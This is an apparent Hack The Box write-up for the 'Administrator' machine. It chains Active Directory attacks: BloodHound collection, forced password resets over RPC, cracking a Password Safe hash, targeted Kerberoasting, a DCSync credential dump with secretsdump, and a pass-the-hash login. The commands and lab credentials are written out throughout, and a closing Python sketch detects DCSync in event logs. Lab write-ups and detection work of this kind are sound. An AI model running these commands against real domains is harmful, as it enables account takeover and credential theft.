Credentials provided by HTB

Olivia:ichliebedich

 

Grab bloodhound data

bloodhound-python -u olivia -d administrator.htb -c All -ns 10.10.11.42

 

We have GenericAll over michael, so we can change his password

net rpc password "michael" "newP@ssword2022" -U "administrator.htb"/"olivia"%"ichliebedich" -S "dc.administrator.htb"

 

netexec smb 10.10.11.42 -u "michael" -p "newP@ssword2022"
 

 

Michael can change benjamin's password

Same command again

net rpc password "benjamin" "newP@ssword2022" -U "administrator.htb"/"michael"%"newP@ssword2022" -S "dc.administrator.htb"

 

 

benjamin is part of share moderators, so I tried FTP and his login worked

Never seen this file before, but we can turn it into a john hash

pwsafe2john Backup.psafe3 > hash.txt

cat hash.txt
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050

 

 

Hash cracks to tekieromucho

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

 

 

Downloaded password safe on my local machine

I couldn't grab a screenshot, as every time you try to screenshot, the app disappears for security reasons. But there are the 3 users and their passwords below.

alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur

 

Only emily works

Emily has GenericWrite over ethan

 

 

First attempt failed due to “Clock skew too great”

 

 

Sync time server

sudo ntpdate 10.10.11.42

 

Running exploit again

python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

 

And we get the hash

$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$be77d368f305fe0416a4e866f27a9723$...

 

Hash cracks to limpbizkit

ethan:limpbizkit

Still can't remote in, but ethan can perform a DCSync attack

Dump hashes

impacket-secretsdump 'administrator.htb'/'ethan':'limpbizkit'@'10.10.11.42' 

 

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets

Remote in as admin and grab both flags

evil-winrm -i 10.10.11.42 -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e

 

 

This machine was rated as a medium but it was pretty easy and straightforward.
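
The DCSync step above (ethan pulling NTDS.DIT secrets over DRSUAPI) shows up on the domain controller as Event ID 4662 records carrying the replication extended-right GUIDs. The following detection sketch is an added example, not part of the original writeup; it assumes directory service access auditing is enabled, that events are already parsed into dicts, and the allow-listed account name `svc_dirsync` is hypothetical.

```python
import re

# Extended-right GUIDs exercised by a directory replication (DRSUAPI) request.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)
ALLOWED = {"svc_dirsync"}  # assumption: hypothetical non-DC account allowed to replicate

def find_dcsync(events, allowed=ALLOWED):
    """Flag Event 4662 records where a non-machine account used replication rights."""
    hits = {}
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        user = ev.get("SubjectUserName", "").lower()
        # Machine accounts end in "$"; DC-to-DC replication is expected traffic.
        if user.endswith("$") or user in allowed:
            continue
        # 0x100 is Control Access, the mask used for extended rights.
        if not int(ev.get("AccessMask", "0x0"), 16) & 0x100:
            continue
        guids = (g.lower() for g in GUID_RE.findall(ev.get("Properties", "")))
        rights = {REPL_RIGHTS[g] for g in guids if g in REPL_RIGHTS}
        if rights:
            hits.setdefault(user, set()).update(rights)
    # Get-Changes-All is the right that exposes password hashes.
    return [{"account": u, "rights": sorted(r),
             "severity": "high" if "DS-Replication-Get-Changes-All" in r else "medium"}
            for u, r in sorted(hits.items())]

DOMAIN_DNS = "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"  # domainDNS object class GUID
# Constructed sample records: field names follow Event 4662, values are invented.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC$", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} " + DOMAIN_DNS},
    {"EventID": 4662, "SubjectUserName": "ethan", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} " + DOMAIN_DNS},
    {"EventID": 4662, "SubjectUserName": "ethan", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} " + DOMAIN_DNS},
    {"EventID": 4662, "SubjectUserName": "emily", "AccessMask": "0x10",
     "Properties": "%%7684 {00000000-0000-0000-0000-000000000000}"},  # constructed GUID
    {"EventID": 4624, "SubjectUserName": "ethan"},
]

if __name__ == "__main__":
    print(find_dcsync(SAMPLE_EVENTS))
```

Replication requests from any user account that is not a domain controller or a known sync service are worth alerting on; the same review should remove the replication rights from accounts like ethan that have no need for them.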